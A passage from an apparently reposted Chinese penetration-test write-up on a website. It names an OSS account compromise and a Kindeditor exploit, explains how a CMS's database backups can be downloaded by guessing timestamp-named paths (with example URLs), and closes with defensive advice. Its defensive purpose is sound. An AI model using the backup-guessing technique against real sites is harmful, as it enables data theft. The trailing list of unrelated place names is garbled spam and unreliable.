(5)OSS帳號及登錄OSS服務器查看

(6)Kindeditor文件編輯器漏洞利用

2.通過分析服務器上數據庫,獲取該CMS早期版本,通過分析其文件發下數據庫文件備份后可以被下載。

(1)數據庫備份時會自動生成一個記錄,該記錄即為數據備份文件夾名稱,例如1545946653為文件名稱,則詳細的下載地址為:

http://localhost//demo/public/db_backup/1545946653/1545946653_1.sql

http://localhost//demo/public/db_backup/1545946653/1545946653_9.sql

(2)即使無Root權限,也可以獲取數據庫文件,將數據進行備份,然后下載即可,如圖16所示,按照命名規則進行下載即可。

對某網站的一次掃描及滲 透測試

圖16下載數據庫文件

3.防御方法

(1)在本文中,Linux服務器已經進行嚴格的權限設置

(2)MySQL數據庫賬號權限不宜為Root權限,一個數據庫用戶對應一個數據庫,最少授權。

(3)CMS中不要留有SQL查詢公開接口,該接口會成為突破的缺口。

(4)后臺結合手機驗證碼進行登錄驗證,即時弱口令也無法登錄。

如果覺得本文不錯,請訪問作者更多精彩專欄文章:Web網站安全評估分析及防御和《網絡安全入門到實戰,讓SQLmap 飛一會兒》

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

乐至县| 司法| 慈利县| 拜泉县| 全南县| 香港| 桑日县| 清远市| 郯城县| 广宁县| 宁陕县| 富蕴县| 交城县| 松原市| 阿城市| 彩票| 赤城县| 时尚| 兴仁县| 綦江县| 平阴县| 嘉善县| 区。| 平乐县| 光泽县| 洮南市| 丰县| 夏河县| 济南市| 云龙县| 沂源县| 宝鸡市| 桦南县| 镇康县| 阳曲县| 阳谷县| 洛川县| 广平县| 东平县| 偃师市| 增城市|